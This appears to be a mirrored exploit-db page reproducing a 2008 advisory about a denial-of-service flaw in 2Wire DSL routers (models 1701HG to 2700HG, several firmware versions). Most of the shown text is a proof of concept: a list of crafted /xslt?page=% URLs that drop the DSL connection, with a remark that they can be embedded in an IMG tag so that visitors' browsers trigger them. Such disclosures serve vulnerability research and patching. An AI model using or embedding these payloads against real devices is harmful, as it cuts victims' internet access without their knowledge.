bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/dos/7060.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

34 lines
No EOL
876 B
Text
Raw Permalink Blame History

2WIRE ROUTER DSL DENIAL OF SERVICE
VULNERABLE
Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51
The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character.
PoC: (this can be set in an IMG tag or whatever)
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
http://home...
etc...
hkm
hkm {@} hakim.ws
Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex.
# milw0rm.com [2008-11-08]
Reference in a new issue View git blame Copy permalink